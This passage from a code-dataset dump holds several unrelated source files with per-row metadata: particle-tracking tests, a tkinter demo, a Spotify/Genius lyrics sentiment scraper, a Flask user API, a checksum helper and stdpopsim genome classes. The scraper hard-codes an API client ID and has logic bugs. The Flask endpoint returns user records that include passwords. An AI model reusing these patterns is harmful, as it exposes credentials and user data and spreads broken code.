tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-locate-preprocess: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-memory: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-predict: yep\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestop: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-link-adaptivestep: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-st-threshold: -1\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-quantile: -1.0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('tp-filter-cl-threshold: 0\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: 11\n')
cf.write('tp-link-searchrange: 10\n')
cf.write('jobs:\n')
cf.write(' - video: dummy.avi\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
with self.assertRaises(SystemExit) as cm:
tp.configure_tracker(opt['--configuration'])
self.assertEqual(cm.exception.code, EX_CONFIG)
remove(cf.name)
def test_locate_features(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset) * 2 + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
self.assertEqual(tp.jobs[0].outdir, dirname(realpath(self._vf.name)))
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 9))
tp.jobs[0].release_memory()
remove(cf.name)
def test_link_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].h5storage))
self.assertEqual(dirname(realpath(tp.jobs[0].h5storage)),
dirname(realpath(self._vf.name)))
with trackpy.PandasHDFStoreBig(tp.jobs[0].h5storage) as sf:
res = sf.dump()
self.assertEqual(res.shape, (self._nframes * self._nparticles, 10))
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_filter_trajectories(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('tp-filter-cl-threshold: 200\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.filter_trajectories(tp.jobs[0])
self.assertEqual(tp.jobs[0].dflink.shape, (self._nframes * self._nparticles, 10))
tp.jobs[0].release_memory()
remove(cf.name)
def test_export_video(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
tp.jobs[0].load_frames()
tp.jobs[0].preprocess_video()
tp.locate_features(tp.jobs[0])
tp.link_trajectories(tp.jobs[0])
tp.export_video(tp.jobs[0])
self.assertTrue(isfile(tp.jobs[0].avitracked))
self.assertEqual(dirname(realpath(tp.jobs[0].avitracked)),
dirname(realpath(self._vf.name)))
tp.jobs[0].release_memory()
remove(tp.jobs[0].avitracked)
remove(cf.name)
def test_run(self):
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' period-frame: [0, 100]\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_OK)
remove(cf.name)
remove(tp.jobs[0].avitracked)
cf = NamedTemporaryFile(mode='w', suffix='.yml', delete=False)
cf.write('tp-locate-diameter: ' + str(self._pdiameter) + '\n')
cf.write('tp-link-searchrange: ' + str(self._hoffset * 2) + '\n')
cf.write('tp-filter-st-threshold: ' + str(int(self._nframes / 2)) + '\n')
cf.write('jobs:\n')
cf.write(' - video: ' + self._vf.name + '\n')
cf.write(' crop-margins: [0, 2000, 0, 2000]\n')
cf.close()
opt = {'--configuration': cf.name}
tp = TrackParticles(opt)
tp.configure_tracker(opt['--configuration'])
rval = tp.run()
self.assertEqual(rval, EX_CONFIG)
remove(cf.name)
| en | 0.461779 | #------------------------------------------------------------------------------# # Copyright 2018 <NAME>. All rights reserved. Use of this source # # code is governed by a MIT license that can be found in the LICENSE file. # #------------------------------------------------------------------------------# Tests for module `betrack.commands.trackparticles`. # Create temporary video file.. # Must be odd! # Remove temporary file.. | 1.9651 | 2 |
TkInter/Label/main.py | kuhakuu04/Python_PyQt5_GUI | 0 | 6612399 | <filename>TkInter/Label/main.py
import tkinter
# buat dulu frame-nya
frame = tkinter.Tk()
frame.title("Tkinter Frame 1")
# terus buat button-nya dan masukin ke dalam frame
button = tkinter.Label(frame, text="hello world")
button.pack()
# biar dia keluar dia harus di looping
frame.mainloop() | <filename>TkInter/Label/main.py
import tkinter
# buat dulu frame-nya
frame = tkinter.Tk()
frame.title("Tkinter Frame 1")
# terus buat button-nya dan masukin ke dalam frame
button = tkinter.Label(frame, text="hello world")
button.pack()
# biar dia keluar dia harus di looping
frame.mainloop() | id | 0.790498 | # buat dulu frame-nya # terus buat button-nya dan masukin ke dalam frame # biar dia keluar dia harus di looping | 3.795753 | 4 |
docs/report/fa20-523-341/project/code/get_music_data.py | mikahla1/cybertraining-dsc.github.io | 4 | 6612400 | import csv
import os
import re
import spotipy # library for interacting with spotify api
from spotipy.oauth2 import SpotifyClientCredentials # handles oath sign in with spotify api credentials
import requests # make http requests
from bs4 import BeautifulSoup # read page content from when opening genius urls
import nltk # nlp library
from nltk.sentiment.vader import SentimentIntensityAnalyzer # module for sentiment analysis
from nltk.corpus import stopwords # used to remove common words like 'the, at, and' from lyrics
nltk.download('vader_lexicon')
nltk.download('stopwords')
# search for a song on genius with song title and artist name, returns url to lyrics page for the song
def get_genius_url(title, artist):
genius = 'https://api.genius.com/search'
data = {'q': title + ' ' + artist}
headers = {'Authorization': 'Bearer ' + '<KEY>'}
response = requests.get(genius, data=data, headers=headers)
song_url = ''
for hit in response.json()['response']['hits']:
if artist == hit['result']['primary_artist']['name']:
# print(title + '|' + artist)
song_url = hit['result']['url']
break
return song_url
# parse lyrics page for lyrics, returns lyrics
def get_genius_lyrics_from_url(genius_url):
lyrics = requests.get(genius_url)
html = BeautifulSoup(lyrics.text, 'html.parser')
genius_lyrics = html.find('div', class_='lyrics').get_text()
return genius_lyrics
# cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content
def lyrical_analysis(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', '', line)
filtered += line + '\n'
cleaned_lyrics = os.linesep.join([line for line in filtered.splitlines() if line])
sia = SentimentIntensityAnalyzer()
# object to return with sentiment data
senti_data = {}
# count for lines that are mostly positive, mostly negative, or mostly neutral
positive = 0
negative = 0
neutral = 0
# iterate line by line through lyrics, read line scores, judge positivity and update the respective count
for line in cleaned_lyrics.split('\n'):
line_sentiment = sia.polarity_scores(line)
score = line_sentiment['compound']
if score >= 0.5:
positive += 1
elif score < -0.1:
negative += 1
else:
neutral += 1
# small calculations to populate senti_data
total = positive + neutral + negative
senti_data['num_positive'] = positive
senti_data['num_negative'] = negative
senti_data['num_neutral'] = neutral
senti_data['positivity'] = positive / total
senti_data['negativity'] = negative / total
senti_data['neutrality'] = neutral / total
return senti_data
# count the number of unique words from tokanized array
def count_unique_words(array_of_words):
unique_words = []
for word in array_of_words:
if word not in unique_words:
unique_words.append(word)
return len(unique_words)
# remove common stopwords from lyrics, tokenize lyrics
def remove_stopwords(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', ' ', line)
filtered += line + 'n'
lyrics_words = re.split(r',| |_|-|!', filtered)
stops = stopwords.words('english')
removed_stopwords = [word for word in lyrics_words if word not in stops and word != '']
return removed_stopwords
def get_track_data(offset):
count = offset
# Dictionary to assign track IDs to the track names, for easy lookup
tracks = {}
# get top 50 songs in 2020
track_results = sp.search(q='year:2016', type='track', limit=50, offset=offset)
# populate tracks dictionary with track ids as keys, track names as values
for i, t in enumerate(track_results['tracks']['items']):
tracks[t['id']] = [t['name'], t['artists'][0]['name']]
# get audio data for each track in tracks
audio_data = sp.audio_features(tracks.keys())
# get lyrical data from for each song
for record in audio_data:
try:
print(str(count) + '/1998 songs looked up')
print(tracks[record['id']][0] + " | " + tracks[record['id']][1])
# store song name and artist name in audio_data
record['name'] = tracks[record['id']][0]
record['artist'] = tracks[record['id']][1]
# fetch url to lyrics page for song
url = get_genius_url(record['name'], record['artist'])
# if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data
if url != '':
lyrics = get_genius_lyrics_from_url(url)
sentiment_data = lyrical_analysis(lyrics)
record['num_positive'] = sentiment_data['num_positive']
record['num_negative'] = sentiment_data['num_negative']
record['num_neutral'] = sentiment_data['num_neutral']
record['positivity'] = sentiment_data['positivity']
record['negativity'] = sentiment_data['negativity']
record['neutrality'] = sentiment_data['neutrality']
lyrics = remove_stopwords(lyrics)
record['word_count'] = len(lyrics)
record['unique_word_count'] = count_unique_words(lyrics)
else:
record['word_count'] = 0
count += 1
except Exception as e:
print(record)
# return array of song data of songs that were successfully analyzed
return [track for track in audio_data if (hasattr(track, 'word_count') and track['word_count'] != 0)]
# API Tokens
clientID = '688f828e787d49768560dc3b01ad1527'
clientSecret = '<KEY>'
credentialsManager = SpotifyClientCredentials(client_id=clientID, client_secret=clientSecret)
sp = spotipy.Spotify(client_credentials_manager=credentialsManager)
data_to_save = []
for num in range(0, 1998, 50):
for track_data in get_track_data(num):
data_to_save.append(track_data)
fields = data_to_save[0].keys()
with open('./data/tracks2016.csv', 'w') as data_file:
writer = csv.DictWriter(data_file, fieldnames=fields)
writer.writeheader()
writer.writerows(data_to_save)
print(data_to_save)
print('Length of data_to_save: ' + str(len(data_to_save)))
| import csv
import os
import re
import spotipy # library for interacting with spotify api
from spotipy.oauth2 import SpotifyClientCredentials # handles oath sign in with spotify api credentials
import requests # make http requests
from bs4 import BeautifulSoup # read page content from when opening genius urls
import nltk # nlp library
from nltk.sentiment.vader import SentimentIntensityAnalyzer # module for sentiment analysis
from nltk.corpus import stopwords # used to remove common words like 'the, at, and' from lyrics
nltk.download('vader_lexicon')
nltk.download('stopwords')
# search for a song on genius with song title and artist name, returns url to lyrics page for the song
def get_genius_url(title, artist):
genius = 'https://api.genius.com/search'
data = {'q': title + ' ' + artist}
headers = {'Authorization': 'Bearer ' + '<KEY>'}
response = requests.get(genius, data=data, headers=headers)
song_url = ''
for hit in response.json()['response']['hits']:
if artist == hit['result']['primary_artist']['name']:
# print(title + '|' + artist)
song_url = hit['result']['url']
break
return song_url
# parse lyrics page for lyrics, returns lyrics
def get_genius_lyrics_from_url(genius_url):
lyrics = requests.get(genius_url)
html = BeautifulSoup(lyrics.text, 'html.parser')
genius_lyrics = html.find('div', class_='lyrics').get_text()
return genius_lyrics
# cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content
def lyrical_analysis(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', '', line)
filtered += line + '\n'
cleaned_lyrics = os.linesep.join([line for line in filtered.splitlines() if line])
sia = SentimentIntensityAnalyzer()
# object to return with sentiment data
senti_data = {}
# count for lines that are mostly positive, mostly negative, or mostly neutral
positive = 0
negative = 0
neutral = 0
# iterate line by line through lyrics, read line scores, judge positivity and update the respective count
for line in cleaned_lyrics.split('\n'):
line_sentiment = sia.polarity_scores(line)
score = line_sentiment['compound']
if score >= 0.5:
positive += 1
elif score < -0.1:
negative += 1
else:
neutral += 1
# small calculations to populate senti_data
total = positive + neutral + negative
senti_data['num_positive'] = positive
senti_data['num_negative'] = negative
senti_data['num_neutral'] = neutral
senti_data['positivity'] = positive / total
senti_data['negativity'] = negative / total
senti_data['neutrality'] = neutral / total
return senti_data
# count the number of unique words from tokanized array
def count_unique_words(array_of_words):
unique_words = []
for word in array_of_words:
if word not in unique_words:
unique_words.append(word)
return len(unique_words)
# remove common stopwords from lyrics, tokenize lyrics
def remove_stopwords(song_lyrics):
lines = re.split(r'\n', song_lyrics)
filtered = ""
for line in lines:
line = re.sub(r'[\(\[].*?[\)\]]|\n|\u2005|\u205f', ' ', line)
filtered += line + 'n'
lyrics_words = re.split(r',| |_|-|!', filtered)
stops = stopwords.words('english')
removed_stopwords = [word for word in lyrics_words if word not in stops and word != '']
return removed_stopwords
def get_track_data(offset):
count = offset
# Dictionary to assign track IDs to the track names, for easy lookup
tracks = {}
# get top 50 songs in 2020
track_results = sp.search(q='year:2016', type='track', limit=50, offset=offset)
# populate tracks dictionary with track ids as keys, track names as values
for i, t in enumerate(track_results['tracks']['items']):
tracks[t['id']] = [t['name'], t['artists'][0]['name']]
# get audio data for each track in tracks
audio_data = sp.audio_features(tracks.keys())
# get lyrical data from for each song
for record in audio_data:
try:
print(str(count) + '/1998 songs looked up')
print(tracks[record['id']][0] + " | " + tracks[record['id']][1])
# store song name and artist name in audio_data
record['name'] = tracks[record['id']][0]
record['artist'] = tracks[record['id']][1]
# fetch url to lyrics page for song
url = get_genius_url(record['name'], record['artist'])
# if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data
if url != '':
lyrics = get_genius_lyrics_from_url(url)
sentiment_data = lyrical_analysis(lyrics)
record['num_positive'] = sentiment_data['num_positive']
record['num_negative'] = sentiment_data['num_negative']
record['num_neutral'] = sentiment_data['num_neutral']
record['positivity'] = sentiment_data['positivity']
record['negativity'] = sentiment_data['negativity']
record['neutrality'] = sentiment_data['neutrality']
lyrics = remove_stopwords(lyrics)
record['word_count'] = len(lyrics)
record['unique_word_count'] = count_unique_words(lyrics)
else:
record['word_count'] = 0
count += 1
except Exception as e:
print(record)
# return array of song data of songs that were successfully analyzed
return [track for track in audio_data if (hasattr(track, 'word_count') and track['word_count'] != 0)]
# API Tokens
clientID = '688f828e787d49768560dc3b01ad1527'
clientSecret = '<KEY>'
credentialsManager = SpotifyClientCredentials(client_id=clientID, client_secret=clientSecret)
sp = spotipy.Spotify(client_credentials_manager=credentialsManager)
data_to_save = []
for num in range(0, 1998, 50):
for track_data in get_track_data(num):
data_to_save.append(track_data)
fields = data_to_save[0].keys()
with open('./data/tracks2016.csv', 'w') as data_file:
writer = csv.DictWriter(data_file, fieldnames=fields)
writer.writeheader()
writer.writerows(data_to_save)
print(data_to_save)
print('Length of data_to_save: ' + str(len(data_to_save)))
| en | 0.895162 | # library for interacting with spotify api # handles oath sign in with spotify api credentials # make http requests # read page content from when opening genius urls # nlp library # module for sentiment analysis # used to remove common words like 'the, at, and' from lyrics # search for a song on genius with song title and artist name, returns url to lyrics page for the song # print(title + '|' + artist) # parse lyrics page for lyrics, returns lyrics # cleans up song lyrics, removing empty lines, section headings, and any data that is not lyrical content # object to return with sentiment data # count for lines that are mostly positive, mostly negative, or mostly neutral # iterate line by line through lyrics, read line scores, judge positivity and update the respective count # small calculations to populate senti_data # count the number of unique words from tokanized array # remove common stopwords from lyrics, tokenize lyrics # Dictionary to assign track IDs to the track names, for easy lookup # get top 50 songs in 2020 # populate tracks dictionary with track ids as keys, track names as values # get audio data for each track in tracks # get lyrical data from for each song # store song name and artist name in audio_data # fetch url to lyrics page for song # if url exists, perform lyrical analyses. add lyrical information to the audio data already contained in audio_data # return array of song data of songs that were successfully analyzed # API Tokens | 3.048374 | 3 |
app_api/test1.py | yanghuizhi/Flask_Learn_YHZ | 0 | 6612401 | <reponame>yanghuizhi/Flask_Learn_YHZ
# !/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: yanghuizhi
# Time: 2022/2/22 20:13
from flask import jsonify
from app_api import app_api as app
data = [
{"id": 1, "username": "小明", "password": "<PASSWORD>", "role": 0, "sex": 0, "telephone": "10086", "address": "北京市海淀区"},
{"id": 2, "username": "李华", "password": "<PASSWORD>", "role": 1, "sex": 0, "telephone": "10010", "address": "广州市天河区"},
{"id": 3, "username": "大白", "password": "<PASSWORD>", "role": 0, "sex": 1, "telephone": "10000", "address": "深圳市南山区"}
]
@app.route("/users", methods=["GET"])
def get_all_users():
"""获取所有用户信息"""
return jsonify({"code": "0", "data": data, "msg": "操作成功"})
@app.route("/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
"""获取某个用户信息"""
if user_id > 0 and user_id <= len(data):
return jsonify({"code": "0", "data": data[user_id - 1], "msg": "操作成功"})
return jsonify({"code": "1", "msg": "用户不存在"}) | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: yanghuizhi
# Time: 2022/2/22 20:13
from flask import jsonify
from app_api import app_api as app
data = [
{"id": 1, "username": "小明", "password": "<PASSWORD>", "role": 0, "sex": 0, "telephone": "10086", "address": "北京市海淀区"},
{"id": 2, "username": "李华", "password": "<PASSWORD>", "role": 1, "sex": 0, "telephone": "10010", "address": "广州市天河区"},
{"id": 3, "username": "大白", "password": "<PASSWORD>", "role": 0, "sex": 1, "telephone": "10000", "address": "深圳市南山区"}
]
@app.route("/users", methods=["GET"])
def get_all_users():
"""获取所有用户信息"""
return jsonify({"code": "0", "data": data, "msg": "操作成功"})
@app.route("/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
"""获取某个用户信息"""
if user_id > 0 and user_id <= len(data):
return jsonify({"code": "0", "data": data[user_id - 1], "msg": "操作成功"})
return jsonify({"code": "1", "msg": "用户不存在"}) | zh | 0.305735 | # !/usr/bin/env python # -*- coding: utf-8 -*- # Author: yanghuizhi # Time: 2022/2/22 20:13 获取所有用户信息 获取某个用户信息 | 2.864816 | 3 |
tasks/tests.py | tschelbs18/fruitful | 0 | 6612402 | <gh_stars>0
from django.test import TestCase
# Create your tests here.
from .models import *
'''
class ModelsTestCase(TestCase):
def setUp(self):
# Instantiate some of my models for testing purposes
# User, User Profile, Error, Task, StandardReward, User Reward
username = 'testymctestface'
password = '<PASSWORD>'
email = '<EMAIL>'
first_name = 'testy'
last_name = 'mctesterson'
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user_profile = UserProfile(user=user)
def test_user_name(self):
user = User.objects.get(username='testymctestface')
profile = UserProfile.objects.get(user=user)
self.assertEqual(profile, user.username)
def test_true(self):
self.assertTrue(True)
'''
| from django.test import TestCase
# Create your tests here.
from .models import *
'''
class ModelsTestCase(TestCase):
def setUp(self):
# Instantiate some of my models for testing purposes
# User, User Profile, Error, Task, StandardReward, User Reward
username = 'testymctestface'
password = '<PASSWORD>'
email = '<EMAIL>'
first_name = 'testy'
last_name = 'mctesterson'
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user_profile = UserProfile(user=user)
def test_user_name(self):
user = User.objects.get(username='testymctestface')
profile = UserProfile.objects.get(user=user)
self.assertEqual(profile, user.username)
def test_true(self):
self.assertTrue(True)
''' | en | 0.540586 | # Create your tests here. class ModelsTestCase(TestCase): def setUp(self): # Instantiate some of my models for testing purposes # User, User Profile, Error, Task, StandardReward, User Reward username = 'testymctestface' password = '<PASSWORD>' email = '<EMAIL>' first_name = 'testy' last_name = 'mctesterson' user = User.objects.create_user(username, email, password) user.first_name = first_name user.last_name = last_name user_profile = UserProfile(user=user) def test_user_name(self): user = User.objects.get(username='testymctestface') profile = UserProfile.objects.get(user=user) self.assertEqual(profile, user.username) def test_true(self): self.assertTrue(True) | 2.851296 | 3 |
checksums.py | carterbrwn2/greyfish | 6 | 6612403 | """
BASICS
Computes the SHA256 checksum of a file
"""
import hashlib
# Computes the SHA 256 checksum of a file given its name
# Based on https://gist.github.com/rji/b38c7238128edf53a181
def sha256_checksum(filename, block_size=65536):
    """Return the hex SHA-256 digest of *filename*, read in *block_size* chunks."""
    digest = hashlib.sha256()
    with open(filename, 'rb') as handle:
        chunk = handle.read(block_size)
        # Stream the file so arbitrarily large inputs fit in memory.
        while chunk:
            digest.update(chunk)
            chunk = handle.read(block_size)
    return digest.hexdigest()
| """
BASICS
Computes the SHA256 checksum of a file
"""
import hashlib
# Computes the SHA 256 checksum of a file given its name
# Based on https://gist.github.com/rji/b38c7238128edf53a181
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
| en | 0.788024 | BASICS Computes the SHA256 checksum of a file # Computes the SHA 256 checksum of a file given its name # Based on https://gist.github.com/rji/b38c7238128edf53a181 | 3.93899 | 4 |
stdpopsim/genomes.py | LohmuellerLab/stdpopsim | 1 | 6612404 | """
Infrastructure for defining basic information about the genomes of
species.
"""
import stdpopsim.genetic_maps as genetic_maps
import msprime
import warnings
class Genome(object):
    """
    Class representing the genome for a species.

    Holds the per-chromosome table, wires each chromosome back to the
    species and its default genetic map, and caches the total length.

    .. todo:: Define the facilities that this object provides.
    """

    def __init__(self, species, chromosomes, default_genetic_map=None):
        self.species = species
        self.default_genetic_map = default_genetic_map
        self.chromosomes = {}
        self.length = 0
        for chrom in chromosomes:
            # Register the chromosome and point it at its genome context.
            chrom.default_genetic_map = default_genetic_map
            chrom.species = species
            self.chromosomes[chrom.name] = chrom
            self.length += chrom.length

    def __str__(self):
        lines = ["Genome for {}:".format(self.species), "Chromosomes:"]
        # Longest chromosome first.
        for chrom in sorted(self.chromosomes.values(), key=lambda c: -c.length):
            lines.append("\t{}".format(chrom))
        return "\n".join(lines) + "\n"

    @property
    def mean_recombination_rate(self):
        """
        Weighted mean recombination rate across all chromosomes
        in the genome.

        :rtype: float
        """
        # Weight each chromosome's rate by its share of the genome length.
        return sum(
            chrom.default_recombination_rate * (chrom.length / self.length)
            for chrom in self.chromosomes.values()
        )
class Chromosome(object):
    """
    Class representing a single chromosome for a species.

    Carries the chromosome's length and default recombination/mutation
    rates; ``species`` and ``default_genetic_map`` are filled in by the
    owning :class:`Genome`.

    .. todo:: Define the facilities that this object provides.
    """

    def __init__(self, name, length, default_recombination_rate, default_mutation_rate):
        self.name = name
        self.length = length
        self.default_recombination_rate = default_recombination_rate
        self.default_mutation_rate = default_mutation_rate
        # Populated by Genome.__init__ once the chromosome is registered.
        self.species = None
        self.default_genetic_map = None

    def __repr__(self):
        template = (
            "{{'name': {}, 'length': {}, "
            "'default_recombination_rate': {}, "
            "'default_mutation_rate': {}}}"
        )
        return template.format(
            self.name, self.length,
            self.default_recombination_rate, self.default_mutation_rate)

    def __str__(self):
        return self.__repr__()

    def recombination_map(self, map_name=None):
        """
        Returns an :class:`msprime.RecombinationMap` instance representing the
        recombination map for this chromosome. If ``map_name`` is provided,
        return the corresponding recombination map; if not, use the default
        recombination map for this species.
        """
        chosen = map_name if map_name is not None else self.default_genetic_map
        genetic_map = genetic_maps.get_genetic_map(self.species, chosen)
        if not genetic_map.contains_chromosome_map(self.name):
            # No per-chromosome entry: warn and substitute a flat zero-rate map.
            warnings.warn(
                "Warning: recombination map not found for chromosome: '{}'"
                " on map: '{}', substituting a zero"
                "-recombination map.".format(self.name, chosen))
            return msprime.RecombinationMap.uniform_map(self.length, 0)
        return genetic_map.get_chromosome_map(self.name)
| """
Infrastructure for defining basic information about the genomes of
species.
"""
import stdpopsim.genetic_maps as genetic_maps
import msprime
import warnings
class Genome(object):
"""
Class representing the genome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, species, chromosomes, default_genetic_map=None):
self.species = species
self.default_genetic_map = default_genetic_map
self.chromosomes = {}
self.length = 0
for chromosome in chromosomes:
self.chromosomes[chromosome.name] = chromosome
chromosome.default_genetic_map = default_genetic_map
chromosome.species = species
self.length += chromosome.length
def __str__(self):
s = "Genome for {}:\n".format(self.species)
s += "Chromosomes:\n"
length_sorted = sorted(self.chromosomes.values(), key=lambda x: -x.length)
for chrom in length_sorted:
s += "\t{}\n".format(chrom)
return s
@property
def mean_recombination_rate(self):
"""
This method return the weighted mean recombination rate
across all chomosomes in the genome.
:rtype: float
"""
mean_recombination_rate = 0
for chrom in self.chromosomes.values():
normalized_weight = chrom.length / self.length
cont = chrom.default_recombination_rate*normalized_weight
mean_recombination_rate += cont
return mean_recombination_rate
class Chromosome(object):
"""
Class representing a single chromosome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, name, length, default_recombination_rate, default_mutation_rate):
